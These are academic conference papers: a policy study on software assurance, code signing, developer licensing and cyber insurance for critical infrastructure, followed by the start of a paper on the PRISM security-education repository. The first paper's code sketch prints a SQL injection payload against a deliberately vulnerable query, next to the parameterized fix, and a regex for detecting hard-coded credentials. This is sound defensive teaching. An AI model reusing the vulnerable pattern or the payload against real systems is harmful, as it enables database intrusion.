Malware can get into vulnerable systems without detection by anti-virus measures because it exploits trusted software. Bad programming practices cause most preventable malware attacks (Goertzel et. al. 2007). The Software Engineering Institute estimates that 90 percent of reported security incidents result from exploits against defects in the design or code of software (Mead, et. al, 2009). The defects exploited stem from a relatively small number of known programming errors, such as failing to check data input before adding it to a database, hard-coding credentials, or developing applications that depend on over-privileged accounts to run (MITRE & SANS, 2010).
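The first error class named above, failing to check data input before adding it to a database, can be illustrated with a short sketch; the schema, table, and payload are illustrative, and the remedy shown is the standard parameterized-query idiom.

```python
import sqlite3

# Sketch of unchecked input reaching a database, and the parameterized-query
# remedy. Table contents and the injection payload are illustrative.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT)")
conn.execute("INSERT INTO users VALUES ('alice')")

user_input = "alice' OR '1'='1"  # classic injection payload

# Vulnerable pattern: the payload rewrites the WHERE clause and matches every row.
vulnerable = conn.execute(
    "SELECT count(*) FROM users WHERE name = '%s'" % user_input
).fetchone()[0]

# Safe pattern: the driver binds the payload as a literal string, matching no row.
safe = conn.execute(
    "SELECT count(*) FROM users WHERE name = ?", (user_input,)
).fetchone()[0]

print(vulnerable, safe)
```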

Malware has an additional hidden cost to the economy because the true costs of the “zero-day” malware effect are extremely difficult to measure, since the attacks are undetectable. When software with vulnerabilities is released, on its “zero-day” the attackers’ activities cannot be blocked or detected. The delay between the developer learning of a flaw and making a fix available, and administrators installing it on all affected systems, can lag for years. Even with patches available, the zero-day risk remains a threat to CI when organizations or consumers are unaware of the risk or the patch. Patching is a failed program of reactive repairs.

3. Software risks to the Critical Cyber Infrastructure (CCI) and proposed mitigations

We must assess the potential damage caused by cyber threats and find ways to strengthen the resilience and defence of the CCI. “Stuxnet demands that we look not just to the security community but also to the system designers, planners, engineers, and operators of our essential technology and physical infrastructures.” (Assante, 2010)

One of the first rules of defence is deterrence, so approaches for enhancing the current level of CCI defence should fix the preventable errors. Software assurance is a form of deterrence because it is the practice of providing high levels of software quality, free of known defects (Wang, et. al, 2008). Techniques such as coding standards improve deterrence by making simple attacks fail and increasing the resources needed for successful attacks.

3.1 Mitigation: Developer non-repudiation

Requiring CI software developers and publishers to sign code modules creates an accountability process. To implement code signing, a system similar to the web domain registration system, with a ‘WhoIS’-style lookup, could be combined with a Public Key Infrastructure (PKI) like the SSL registration systems. Developers can start to sign all code modules or apps, tying each to an individual developer and publisher. Major popular IDEs can also support a PKI plug-in system for code-signing development; certificates for code signing are already available as plug-ins in many IDEs.

Developer accountability can be handled at a level similar to engineering: for example, if the senior developer signs the code, then they are accountable for security issues later, just as an architect or engineer is. Company management should sign the final code again, so they also have tangible accountability for the software quality, much as the US Sarbanes-Oxley (SOX) law requires the CEO/CFO to sign off on the accuracy of public financial records.

Customer systems could be configured to disallow anonymous code from running. By forcing all software to present credentials in order to run, we can start to establish a trace for code that is working or failing.
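The signing-and-verification flow could be sketched as follows. This is a deliberately simplified stand-in: a real deployment would use asymmetric PKI signatures checked against a registered developer certificate, whereas here an HMAC over the module bytes, with a hypothetical registry-issued key, illustrates the accountability check using the standard library alone.

```python
import hashlib
import hmac

# Simplified stand-in for PKI code signing: an HMAC over the module bytes
# plays the role of the developer's signature. Key and module are hypothetical.

def sign_module(module_bytes: bytes, developer_key: bytes) -> str:
    """Developer signs a code module before release."""
    return hmac.new(developer_key, module_bytes, hashlib.sha256).hexdigest()

def verify_module(module_bytes: bytes, signature: str, developer_key: bytes) -> bool:
    """Customer system refuses to run modules whose signature does not verify."""
    expected = hmac.new(developer_key, module_bytes, hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, signature)

key = b"registry-issued-key-for-developer-42"  # hypothetical registry key
module = b"print('hello CCI')"
sig = sign_module(module, key)

assert verify_module(module, sig, key)                  # untampered module runs
assert not verify_module(module + b"#patch", sig, key)  # tampered module refused
```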

3.2 Mitigation: Create development tools to assist and automate security

The government and major Integrated Development Environment (IDE) developers should collaborate to create security test suites that identify common errors automatically, even at the compiler level. IDEs should check code much as W3C validation engines corrected common HTML errors. This will help programmers improve without additional cost. Automated IDE test tools will transition legitimate developers and publishers to comply with that new level of quality. With free tools for checking code, compliance becomes easier at all layers of development; the success of this approach is evident in the W3C and the rare occurrence today of unreadable HTML pages. HTML code validation is now trivial, and most web code is generated by content management frameworks, so the workload has shifted from the individual developer to the tools.
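One such automated check an IDE could run is a scan for likely hard-coded credentials, the weakness behind Stuxnet's entry point; the pattern and sample source below are illustrative, not a production rule set.

```python
import re

# Illustrative lint rule: flag lines that look like hard-coded credentials.
# The regex and the sample source are toy examples of the kind of check an
# IDE or compiler pass could apply automatically.
CREDENTIAL_PATTERN = re.compile(
    r"""(password|passwd|pwd|secret)\s*=\s*['"][^'"]+['"]""", re.IGNORECASE
)

def find_hardcoded_credentials(source: str):
    """Return (line_number, line) pairs that look like hard-coded credentials."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        if CREDENTIAL_PATTERN.search(line):
            hits.append((lineno, line.strip()))
    return hits

sample = 'db_password = "2WSXcder"\nuser = input("name: ")\n'
print(find_hardcoded_credentials(sample))  # only the first line is flagged
```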

3.3 Mitigation: Professionally license CCI software developers and publishers

Many vital economic sectors in the physical world have accredited professionals to create a culture of quality and security. Electricians, architects, and engineers are certified and accredited to practice because the quality of their work affects public safety and infrastructure. However, unlike other CI professions, there is no legally recognized accreditation process for IT. Anyone can develop software without liability for the behaviour of that software. IT workers design, construct, and manage applications, databases, and network systems for all types of public-trust transactions, and they do all this without professional support systems.

We can use the safety and security measures of other professions as a model for software assurance. Like these conventional professions, IT professionals are also responsible for major portions of the critical infrastructure in the cyber world. “[IT] practitioners can produce results as inconvenient or dangerous as any medical or legal mishap, without their having the amount of regulation or informed public scrutiny which both those areas command.” (Wilkes, 1997: 88) By leveraging the existing professional frameworks that support other CI professions, such as accounting, engineering, and medicine, we can adopt policies and technologies that support improved public safety. Existing technology systems can create accountability for the software industry and transparency for its customers. While academic training and apprenticeship still provide the basis for disseminating knowledge of good models and best practices, professional boards and licenses should support these practices with ethics. Certification and licensing options have the potential to legitimize IT as a profession by improving the quality of output (Wilkes, 1997). These certifications still face implementation challenges: there are numerous standards and organization bodies in the software industry, but none of them has any enforcement capability, which makes adoption of any minimum standard extremely difficult. Key industry organizations such as the ACM and IEEE, which lead the professionalism of the industry, have only voluntary membership, which limits their effectiveness.

Any application that supports the CI should have certified developers and publishers licensed to code for CCI systems. By differentiating in this way, the consumer will get security accountability built into systems. The market will begin to demand the same levels of quality as in other industries, which will encourage software developers to distinguish themselves in the marketplace. This would also raise the barriers to entry in the software development market and ease the pressure on existing competitors who are able to adopt assurance practices, benefiting both the software industry and the consumer.

4. Market risks preventing software quality and security and proposed mitigations

The current highly competitive commercial software marketplace has neither the incentives nor the repercussions needed to implement standards. In many situations security is an optional add-on; a common business argument to the developer is to ‘worry about security later’. This argument would not be accepted if a mechanic had reported that a vehicle was unsafe. There is a widespread lack of individual autonomy: IT workers feel that they cannot prioritize quality and safety ahead of production speed and ‘agility’ within their organizations, due to business pressures. With government-supported licensing, individual practitioners would gain autonomy and legitimacy for security-driven efforts as a matter of compliance.

The customer is at a disadvantage in market knowledge. Consumers expect reasonable security measures, but there is no such assurance. Typically, the customer has to specify particular security measures in the contract; if security is not explicitly in the requirements, implementing it is a burden on the development company. All estimates of the true cost of security in the system are wrong from the first unsecured prototype delivered to the client. The customer is left to learn about security by taking a risk-acceptance posture by default. By accepting insecure software, they incorrectly feed the market an acceptance signal. Without security forced to be “built in” to the process, the uninformed consumer does not know to discriminate between secure and non-secure technologies and demand them accordingly to signal more supply.




The “industry knows best” approach to cyber security is inefficient and a market failure (Assante, 2010). The public’s demand for cyber security is higher than most firms’ individual demand, because the private costs resulting from a cyber incident are often less than the public’s cost. For example, when electronically stored customer credit card information is stolen from a store, the financial institutions are often responsible for the loss, not the store that had badly configured security.

4.1 Vulnerability: Cyber incident data is inconsistent

Most industries have no mandatory cyber incident reporting, which makes the true impact of cyber crime difficult to measure. Regular studies performed by the FBI (CSI, 2009), the Secret Service, Verizon (Baker et. al, 2010) and Microsoft (Microsoft SIR, 2010) all use voluntary surveys and data gathering. However, the reported changes in malware rates differ. The FBI, Microsoft, and Verizon security reports agree that malware attacks are on the rise. However, according to Microsoft’s SIR report, “Software vulnerabilities…have been on the decline since the second half of 2006,” and the report ascribes this progress to better development quality practices (Microsoft SIR, 2010). This disparity results from the two vastly different data sets that Microsoft and Verizon have used; the voluntary nature of cyber incident reporting contributes to these differences. All three reports agree that the data is inconsistent due to the lack of a mandatory reporting system.

4.2 Mitigation: Mandate cyber incident reporting

According to a Computer Security Institute survey, only a small fraction of organizations that experience a cyber attack report it to law enforcement (CSI, 2009). Firms generally do not favour expanded mandatory reporting because they do not want bad press or a negative public perception. The reluctance is even greater when the firm does not suffer any immediate financial loss. Reporting these intrusions (crimes) is in the greater interest of society, because authorities stand a better chance of stopping them if they have more information about the threat in general and can learn from emerging patterns.

To address privacy concerns, a reporting system similar to the U.S. Treasury FinCEN Suspicious Activity Report (SAR) could be used. Currently, most financial institutions are mandated to report certain types of suspicious activity using SARs. SARs are kept secret, have tight dissemination standards, and are an effective tool in fighting financial crime. A similar reporting system for cyber attacks would be equally beneficial. “Disclosure laws” could force software publishers and their customers that support critical infrastructure to report cyber attacks and data breaches to DHS (DHS NIAC, 2009). Mandatory reporting would give a more accurate picture of cyber threats (Goertzel et. al. 2007), help researchers identify weaknesses, and aid in the apprehension of attackers. The data collected would help inform actuarial tables for insurance firms and support risk analyses. Cyber crime incident reporting should be required of all CI industries, first to gain better knowledge about the threat malware poses and to educate business owners and managers about the financial and legal implications of improper software assurance processes.

4.3 Vulnerability: Demand for cyber security

Rational firms should use IT risk management to manage cyber security, but, firms often lack the<br />

knowledge and expertise to implement and it is difficult for firms to measure the effectiveness of investments<br />

into cyber security. (Mead, et. al, 2009) This makes it hard to justify expenditures and results<br />

in the general lack of secure programming investment. The public is left with the costs of a cyber-security<br />

incident such as firms that were the target of the cyber incident as well as its clients,<br />

banks or others who feel its negative effects, and include taxpayers if the government responds.<br />

Since the overall damage of a cyber incident is generally higher for the public, the public would rationally<br />
choose a higher level of investment in cyber security. Unfortunately, the public has little say in the<br />
investment an individual firm decides to make in cyber security, leading to underinvestment in the<br />

eyes of the public. In economic terms, the aggregate private firm’s demand for cyber security is less<br />

than the public’s demand. This is a market failure, which invites regulation or some form of market<br />

correction to rectify this externality.<br />

Figure 2 illustrates a private firm’s efficient level of investment at q1, where the firm’s demand for<br />
security “D” equals the marginal cost “MC” of each additional investment. The marginal social benefit<br />
is the public’s demand, which yields q* where it crosses the marginal cost line. “q*” represents the<br />



Mecealus Cronkrite et al.<br />

socially efficient level of cyber security, which is greater than the private level. The graph in Figure 2<br />
shows that the public’s demand for security is greater than that of individual firms.<br />

Figure 2: Demand vs. Investment in cyber security<br />
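The relationship in Figure 2 can be sketched with a toy linear model; the demand intercepts, slope, and cost below are illustrative assumptions, not figures from the paper.

```python
# Toy linear model of Figure 2 (all parameters are illustrative assumptions).
# Private demand:          D(q)   = 10 - q  (firm's marginal benefit of investment q)
# Marginal social benefit: MSB(q) = 14 - q  (public's demand, higher at every q)
# Marginal cost:           MC     = 2       (constant cost per unit of investment)

def optimal_investment(intercept: float, slope: float, mc: float) -> float:
    """Solve intercept - slope * q = mc for q (demand equals marginal cost)."""
    return (intercept - mc) / slope

q1 = optimal_investment(10.0, 1.0, 2.0)      # private optimum q1
q_star = optimal_investment(14.0, 1.0, 2.0)  # socially efficient level q*

# q* > q1: the firm rationally underinvests relative to the public optimum.
print(q1, q_star)
```

Any model in which the social marginal benefit lies above the private demand at every investment level produces the same qualitative gap between q1 and q*.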

4.4 Mitigation: Create information systems cyber security insurance market<br />

Data breaches usually carry no consequences or fines for the company that lost the customer data,<br />

and even fewer for the development team that wrote the software or configured the servers. A cyber<br />

security insurance market can create an economic incentive for firms to implement better security<br />

standards. To establish the market, governments would have to create laws placing partial liability for<br />
cyber attacks on software publishers and operating firms if they are negligent in failing to implement<br />
sufficient security standards and practices (Baer and Parkinson 2007: 50-56).<br />

With better cyber incident reporting, the research and insurance communities can find common risky<br />
behaviour patterns. Since private insurance companies use actuarial tables and measure risk, they would<br />
be able to establish scalable cyber security requirements. In exchange for coverage and premium<br />

discounts, insurance companies can require private firms to take reasonable steps to protect their<br />

systems, within a risk management system. Premiums can assign a higher risk to IT security<br />

breaches stemming from programming errors and failure to adopt best practice standards in cyber<br />

security.<br />
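A premium schedule of this kind might look like the following sketch; the flag names, loadings, and discount factor are our illustrative assumptions, not real actuarial values.

```python
# Hypothetical cyber insurance premium schedule: risk loadings raise the premium,
# and a documented risk management programme earns a discount. All names and
# factors here are illustrative assumptions, not real actuarial data.
BASE_PREMIUM = 10_000.0

RISK_LOADINGS = {
    "programming_error_breaches": 1.5,   # history of breaches from code defects
    "no_best_practice_standards": 1.3,   # no adopted secure-coding standard
}
DISCOUNTS = {
    "risk_management_system": 0.85,      # firm operates a risk management system
}

def annual_premium(risk_flags, discount_flags):
    """Multiply the base premium by each applicable loading and discount."""
    premium = BASE_PREMIUM
    for flag in risk_flags:
        premium *= RISK_LOADINGS[flag]
    for flag in discount_flags:
        premium *= DISCOUNTS[flag]
    return round(premium, 2)

# A firm with a code-defect breach history but a risk management system in place:
print(annual_premium(["programming_error_breaches"], ["risk_management_system"]))
```

The multiplicative structure mirrors the text: breaches stemming from programming errors raise the price of coverage, while reasonable protective steps lower it.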

Market forces will generate an insurance market that accommodates different sizes of firms. A major<br />

difficulty in implementing this policy is ensuring that premiums are not too costly for firms to afford.<br />

As a result, it may be necessary for government to cap the amount of damages that a firm may<br />

pay. The government can help establish the cyber insurance market by facilitating reinsurance<br />

through indemnifying catastrophic losses.<br />

4.5 Mitigation: Compliance in U.S Federal IT acquisition security standards (fines)<br />

Government IT acquisition and procurement decisions are unlike those of private corporations. In private<br />
concerns, shareholder value should ultimately control spending, so the implementation of security is<br />
driven by profit goals. The US Federal Government has complex goals of public good, accountability,<br />
fairness, and transparency. However, the majority of CCI is located within the private sector, so to<br />
encourage effective standards the government has to rely on market forces and voluntary partnerships<br />
with industry (Golumbic, 2008).<br />

Governments and CI systems are increasingly dependent on commercially developed software, and in<br />
doing so they have transferred security risk upstream to the developers. As a result, the US government<br />
has created many of its own models for secure IT acquisition and procurement that impact system<br />
development processes. For example, the NIST Special Publication 800 series, the DOD standard<br />
DIACAP, and the Federal Information Security Management Act (FISMA) are all US regulations dealing<br />




with security requirements for government information systems. Security rests with the acquisition<br />
policy and contract and with the vendor management controls each agency defines: a non-standard<br />
approach.<br />

However, the GAO has found that the federal government overall has major deficiencies in information<br />
security, mainly due to the lack of technical acquisition expertise needed to interpret and apply security<br />
requirements to contracts, and to the rigor and sustained effort required to keep validating vendor<br />
quality (GAO-09-661T, 2009). Therefore, by increasing the federal IT workforce and capabilities, DHS<br />

NCCD can start to upgrade and improve the performance of security within the US government. Security<br />
requirements should be valued equally with e-government requirements in order to<br />

improve CI defence from disasters and attacks. Moreover, adding vendor non-compliance fines in the<br />

government IT acquisition process should increase the attention paid to CI systems.<br />

5. Conclusions and future work<br />

There is a growing relationship between preventable software assurance failures and exposed critical<br />

cyber infrastructure risk. Preventable software defects remain unresolved at the peril of all software<br />

consumers and endanger the cyber infrastructure on which we all rely. The software consumer is<br />
uninformed and cannot self-assure that the outsourced software they order meets an acceptable<br />
standard. Making the security case clear enough for the public to understand is harder than making the<br />

case to the developer and the business manager through market forces.<br />

The growing black market economy of malware is exploiting the existing known defects in widely distributed<br />

commercial software. Targeting known common software defects is a primary vector to enter<br />

trusted networks and systems. Preventable programming errors turn “zombie” slave computers into<br />
accessories to organized crime. The growing criminalisation of cyber attacks is driving the need for<br />

new controls in the previously unregulated software development culture.<br />

Without support, businesses will tend to favour profits over safety; it is the nature of profit motivation.<br />
Firms on their own will not invest the socially optimal amount in cyber security because<br />
it conflicts with their own rational decision-making criteria. However, supported standards enable<br />
the developer and publisher to mitigate preventable risk.<br />

Improving software assurance practices is one of the key countermeasures for protecting critical infrastructure.<br />

The industry needs to be motivated to encourage accountability and liability on behalf of<br />

the public good by avoiding common errors. This would also raise the barriers to entry on the software<br />

development market and ease the pressure on existing competitors who are able to adopt assurance<br />

practices, while legitimizing IT as a new profession entrusted with the public good of<br />
defending the critical cyber infrastructure.<br />

The proposed approaches examined a framework of increasing government and private controls on<br />

software quality and software assurance outcomes.<br />

Mandate cyber incident reporting for CI industries, to increase transparency and research ability.<br />
Enforce fines for federal IT security non-compliance, to create better vendor compliance.<br />
Create better IDE tools that check for common programming errors, to help prevent the programmer<br />
from making common errors and to increase the resilience of the software infrastructure.<br />
Encourage professional licensing and non-repudiation for CCI developers and publishers, to help<br />
increase accountability and transparency in the publisher and developer community.<br />

The software industry will not be able to negotiate the safety standards process alone, without some<br />

government assistance. There is a need for standards based software professional accreditation to<br />

ensure the consistent application of basic security programming techniques and data privacy. However,<br />

the industry should not wait for legislation. Software publishers can seize the momentum<br />
of media awareness and establish accountability for code security within their own ranks.<br />

Acknowledgements<br />

This work is an extended study of our final team project of IST623 (Introduction to Information Security),<br />

taught by Prof. Joon S. Park, in the School of Information Studies at Syracuse University in<br />

Spring 2010. We would like to thank the class for valuable feedback, insight, and encouragement as<br />

we researched and developed this project during the semester.<br />




The views expressed herein are those of the authors and do not necessarily reflect the views of, and<br />

should not be attributed to, the Department of Homeland Security or any of its agencies.<br />

References<br />

Assante, M.J. 2010, November 17. Testimony of Michael J. Assante, President and Chief Executive Officer National<br />

Board of Information Security Examiners of the United States Inc. Before the Senate Committee on<br />

Homeland Security and Governmental Affairs US Senate Hearing on Securing Critical Infrastructure in the<br />

Age of Stuxnet. Washington D.C.<br />

Baer, W.S. & Parkinson, A. 2007, "Cyberinsurance in IT Security Management,” IEEE Security & Privacy, vol. 5,<br />

no. 3, pp. 50-56.<br />

Baker, W., Goudie, M., Hutton, A., Hylender, C.D., Niemantsverdriet, J., Novak, C., Ostertag, D., Porter, C.,<br />

Rosen, M., Sartin, B. & Tippett, P.,United States Secret Service 2010, July 28-last update, 2010 Data<br />

Breach Investigations Report [Homepage of Verizon], [Online]. Available:<br />

http://www.verizonbusiness.com/resources/reports/rp_2010-data-breach-report_en_xg.pdf [2010, 10/20]<br />

Council of Europe Counterterrorism Task Force 2007, Cyberterrorism-the use of the internet for terrorist purposes.<br />

Council of Europe Publishing, Strasbourg Cedex, France<br />

CSI, “14th Annual 2009 CSI Computer Crime and Security Survey” December, 2009, Computer Security Institute<br />

Falliere, N., Murchu, L.O. & Chien, E. 2010, October-last update, w32 Stuxnet Dossier [Homepage of Symantec],<br />

[Online]. Available:<br />

http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_stuxnet_dos<br />

sier.pdf [2010, 10/20]<br />

GAO May 5, 2009, GAO-09-661T: Testimony before the Subcommittee on Government Management, Organization,<br />

and Procurement; House Committee on Oversight and Government Reform: Cyber Threats and Vulnerabilities<br />

Place Federal Systems at Risk Statement of Gregory C. Wilshusen, Director, Information Security<br />

Issues, GAO, Washington, D.C.<br />

Gelbstein, E. &amp; Kamal, A. 2002, Information insecurity: a survival guide to the uncharted territories of cyber-threats<br />
and cyber-security, 2nd ed, United Nations ICT Task Force and the United Nations Institute for<br />

Training and Research, New York, NY.<br />

Goertzel, K.M., Winograd, T., McKinley, H.L., Oh, L., Colon, M., McGibbon, T., Fedchak, E. & Vienneau, R. 2007,<br />

July 23-last update, Software Security Assurance State-of-the-Art Report (SOAR) [Homepage of Joint endeavour<br />

by IATAC with DACS], [Online]. Available: http://iac.dtic.mil/iatac/download/security.pdf [2010,<br />

10/20].<br />

Golumbic, M.C. 2008, Fighting terror online: the convergence of security, technology, and the law, Springer Verlag,<br />

New York.<br />

McGuinn, M. 2005, October 12-last update, Prioritizing Cyber Vulnerabilities, Final Report and Recommendations<br />

by the Council. [Homepage of DHS-NIAC], [Online]. Available:<br />

http://www.dhs.gov/xlibrary/assets/niac/NIAC_CyberVulnerabilitiesPaper_Feb05.pdf [2010, 10/20] .<br />

Mead, N.R., Allen, J.H., Conklin, A.W., Drommi, A., Harrison, J., Ingalsbe, J., Rainey, J. & Shoemaker, D. 2009,<br />

April-last update, Making the Business Case for Software Assurance [Homepage of Carnegie Mellon Software<br />

Engineering Institute], [Online]. Available: http://www.sei.cmu.edu/reports/09sr001.pdf [2010, 10/20].<br />

Microsoft, “Microsoft Security Intelligence Report Volume 9 (Jan 1 2010 - Jun 30 2010)2010”, [Homepage of Microsoft],<br />

[Online]. Available: http://www.microsoft.com/security/sir/default.aspx [2010, 10/20].<br />

McGurk, Sean 2010, Nov.17 Statement for the Record of Seán P. McGurk Acting Director, National Cybersecurity<br />

and Communications Integration Center Office of Cybersecurity and Communications<br />

National Protection and Programs Directorate Department of Homeland Security Before the United States Senate<br />

Homeland Security and Governmental Affairs Committee, Washington, DC November 17, 2010<br />

MITRE & SANS 2010, April 5-last update, CWE/SANS Top 25 Most Dangerous Programming Errors [Homepage<br />

of MITRE], [Online]. Available: http://cwe.mitre.org/top25/ [2010, 10/20].<br />

NIAC, National Infrastructure Advisory Council September 8, 2009, Critical Infrastructure Resilience Final Report<br />

And Recommendations, DHS, Washington, D.C.<br />

OECD, 2008, “Malicious Software (Malware): A Security Threat to the Internet Economy”, OECD, Seoul, Korea.<br />

US-CERT, “Build Security In. (n.d.).Key Practices for Mitigating the Most Egregious Exploitable Software Weaknesses.<br />

Software Assurance Pocket Guide Series: Development” Volume II Version 1.3.2009, May 24-last<br />

update [Homepage of DHS-US-CERT], [Online]. Available: https://buildsecurityin.uscert.gov/swa/downloads/KeyPracticesMWV13_02AM091111.pdf<br />

[2010, 10/20].<br />

US-CERT Multi-State Information Sharing and Analysis Center and United States Computer Emergency Readiness<br />

Team (US-CERT) 2005, May 16-last update, Malware Threats and Mitigation Strategies [Homepage of<br />

DHS-US-CERT], [Online]. Available: http://www.us-cert.gov/reading_room/malware-threats-mitigation.pdf<br />

[2010, 10/20]<br />

Wang, Y., Zheng, B. & Huang, H. 2008, "Complying with Coding Standards or Retaining Programming Style: A<br />

Quality Outlook at Source Code Level", Journal of Software Engineering and Applications, vol. 1, no. 1, pp.<br />

88.<br />

Wilkes, J. 1997, "Business Ethics: A European Review, Focus: 'Protecting the Public, Securing the Profession:'<br />

Enforcing Ethical Standards among Software Engineers"<br />



Building an Improved Taxonomy for IA Education<br />

Resources in PRISM<br />

Vincent Garramone and Daniel Likarish<br />

Regis University, Denver, USA<br />

garra909@regis.edu<br />

dlikaris@regis.edu<br />

Abstract: To address a perceived lack of availability of educational resources for students and educators in the<br />

field of information assurance, Regis University and the United States Air Force Academy (USAFA) have begun<br />

development of a web portal to store and make available to the public information security-related educational<br />

materials. The portal is named the Public Repository for Information Security Materials (PRISM). In this paper, we<br />

begin with a review of the initial vision for PRISM. We then discuss the development and maintenance of a<br />

deterministic discipline-specific vocabulary, along with the results of mapping curricular content to our initial set of<br />

terms. Of the eight material descriptions used in our evaluation, four could be clearly mapped to the initial<br />
vocabulary, one could be partially mapped, and three did not contain any clearly mappable terms.<br />

Keywords: PRISM, security education, taxonomy, educational resources<br />

1. Introduction<br />

As more of our lives become increasingly dependent on information technology, educating those who<br />

develop and manage those technologies about information assurance (IA) concepts is crucial to help<br />

reduce the risks of our information being lost, stolen or otherwise compromised. Recent attendance at<br />

national conferences for educators (e.g. ISECON (International Systems Educators <strong>Conference</strong>),<br />

CISSE (Colloquium for Information Systems Security Education) and AMCIS (Americas <strong>Conference</strong><br />

on Information Systems)) provided an opportunity to determine the need for security courses and<br />

materials to support them. The organization and promotion of Security Special Interest Groups<br />

(SecSIG) and the increase in the number and variety of security education papers also demonstrate the<br />

increased interest in the field, and the trend has culminated in national recognition that security<br />

education is a national and international concern (Cooper et al 2010).<br />

Unfortunately, aligning existing educational programs to include a focus on security topics has proven<br />

not to be straightforward. For example, although some institutions report success adding security-specific<br />
courses to existing curricula, others find this infeasible because of the significant instruction<br />

time and expertise it requires (Null 2004). As an alternative to adding a security-specific course,<br />

relevant lessons can be integrated into existing courses to teach security concepts (Irvine, Chin, and<br />

Frincke 1998). Instructors wishing to add lessons to existing courses must either create or locate<br />

materials that meet their particular curricular needs. Similar to creating and integrating entire courses,<br />

some instructors may not have the time or expertise to develop effective lessons for every topic they<br />

wish to teach. They also recognize the non-uniqueness of lesson materials and see limited utility in<br />

reinvention of materials that they suspect others have developed (Davis 2010).<br />

To help address these issues and advance the availability of information security education materials,<br />

Regis University and USAFA have initiated a collaborative effort to develop a web portal to store and<br />

make available to the general public information security related educational materials, research,<br />

virtual exercises, and links to security resources. The PRISM web portal will provide an online virtual<br />

space for educators to discuss effective pedagogy, share tools, and collaborate on curriculum<br />

development.<br />

This paper reviews the current vision for the PRISM repository and discusses the development of a<br />

deterministic taxonomy based method of organizing content. The use of deterministic, portal site<br />

analytics is proposed to further improve the forensics content taxonomy and the load process.<br />

2. Vision<br />

The creators of the Public Repository for Information Security Materials (PRISM) web portal intend to<br />

make it a resource for students and educators who are interested in information security education.<br />

Visualization tools, publications, educational materials, links to relevant websites, and research data<br />

are all potential types of material. We envision that individuals, educators and students from K-<br />

Collegiate will contribute to the materials on the site in an ad hoc fashion. The site is a civic commons<br />




portal that relies on the goodwill of participants to contribute content. Future versions of the site will<br />

use publication (e.g. blogs, podcasts, articles) to encourage participants to return to the site for<br />

reasons beyond the teaching materials. In addition, the site has the potential to serve as a<br />

collaborative workspace to discuss tools and teaching methods in both synchronous and<br />

asynchronous modes, and to participate in educational games and online activities.<br />

Part of this effort involves determining the most useful way to classify and organize resources<br />

available on the site. Information security is a broad and complex field of study, and one can quickly<br />

become mired in results irrelevant to their interests when conducting keyword searches. Moreover, it<br />

may be difficult to identify terms that will be most useful in locating specific materials within any given<br />

repository (Dicheva and Dichev 2006), especially since many repositories tend to use very general<br />

metadata definitions that lack the specificity required to effectively locate resources (Moisey 2006).<br />

We anticipate an improved method for locating relevant material with carefully crafted taxonomies,<br />

constructed by analyzing vocabulary usage in curricular literature and actual site searches.<br />

3. Background<br />

In early 2010, PRISM became available to the public. For a complete treatment of the initial vision,<br />

requirements, and technical execution, see (Garramone and Schweitzer 2010). The web portal was<br />

designed with a high degree of flexibility to allow the project to mold itself to the changing needs of the<br />

community. Ease of use for content seekers and developers, as well as for site moderators and<br />

administrators was given priority when selecting the hardware and software components of PRISM.<br />

An initial set of seven publications and eleven interactive lessons was provided by Dr. Schweitzer and<br />

the US Air Force Academy to showcase the types of resources PRISM was designed to contain. A<br />

handful of materials from other sources were also posted to demonstrate potential content types such<br />

as hyperlink resources and educational simulations. Resources were categorized using a custom set<br />

of vocabularies designed to allow users from heterogeneous backgrounds to access the materials<br />

using familiar terms.<br />

In particular, a subset of the Dublin Core (Weibel et al 2008) provided standard metadata.<br />

Additionally, vocabularies from two prominent IA common bodies of knowledge (CBK) (Theoharidou<br />

and Gritzalis 2007) were implemented to organize resources according to their IA topical content.<br />
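A tagged PRISM resource might therefore look like the following sketch; the particular Dublin Core fields and values chosen here are our assumptions for illustration, not the actual PRISM schema.

```python
# Sketch of a resource record combining a Dublin Core subset with IA
# common-body-of-knowledge (CBK) topic tags. The field subset and the sample
# values are illustrative assumptions, not taken from the live PRISM portal.
resource = {
    # Dublin Core elements (subset)
    "title":   "Registry Examination Lab",
    "creator": "Regis University",
    "subject": "computer forensics",
    "type":    "InteractiveResource",
    "format":  "application/zip",
    # CBK topical tags used for guided search
    "cbk_topics": ["Registry Analysis"],
}

# Guided search can filter on the CBK tags, keyword search on the DC fields.
print(sorted(resource))
```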

Although PRISM is a fully functional repository, several challenges remain. Organizing content based<br />

on static metadata sets proves difficult as usage patterns and industry terminology change.<br />

Furthermore, complex tagging requirements for content make it difficult for developers to contribute<br />
their content. In a recent IEEE Transactions on Learning Technologies article, Davis et al. (2010) describe<br />
the more general sharing and deposition of education materials by small colleges and universities in<br />
common repositories. The failure to develop sustainable material repositories results from poor design<br />
decisions and users’ weak motivation to use them, and failure of adoption by communities is related<br />
to difficulty of use, administration, and currency of materials.<br />

4. Dynamic taxonomy based content management<br />

Previous attempts to establish education web portals have been less than successful because of a lack of<br />
participation by resource developers and cumbersome site search strategies for locating interesting<br />

course materials. The upload of resources requires developers to provide metadata descriptors of<br />

their materials based on a fixed taxonomy. Because of the wide variance in resource content, static<br />

taxonomies based on generic structures inherited through the parent portal developer’s best efforts<br />

are not effective. From the resource downloader’s perspective, attempts to retrieve materials are<br />

discouraging because of difficulty in searching for materials described by the same limited taxonomy.<br />

For example, in the Merlot educational material repository, the most granular taxonomic term for<br />

information assurance materials is “Security” under the “Information Technology” heading. This<br />

provides no terminology guidance for those submitting or searching for content, and forces users to<br />

resort to keyword searches.<br />

We used the PRISM portal to investigate a simple, deterministic approach to creating a flexible and<br />

stable taxonomic structure that would allow forensics educators to upload resources and search<br />
content in an easier and more useful way. Our approach consisted of generating an initial list of<br />

forensics descriptors that were manually extracted from current forensics literature and ranked<br />

according to what percentage of the documents each term appeared in. The content of a computer<br />




forensics course was used to evaluate whether the literature based taxonomy approach would<br />

produce an acceptable description of the material. The result of the evaluation confirmed that a<br />

literature based seeded taxonomy was a good starting point, but that refinement is necessary. The<br />

digital forensics topic was chosen as our initial case because Regis University wanted to make lab<br />

materials from its computer forensics course available on the PRISM site and felt these materials<br />

would be representative of content for a graduate forensics class. The weekly lab materials were<br />

qualitatively evaluated using the list of forensics terms derived from current forensics literature. These<br />

results were then compared to actual terms in the lab topic descriptions given in the course syllabus.<br />

4.1 Granularizing PRISM taxonomies<br />

One of the major goals of PRISM is to make searching for content intuitive and efficient. To achieve<br />

this, content must be tagged in a way that allows keyword and guided searches to return accurate<br />

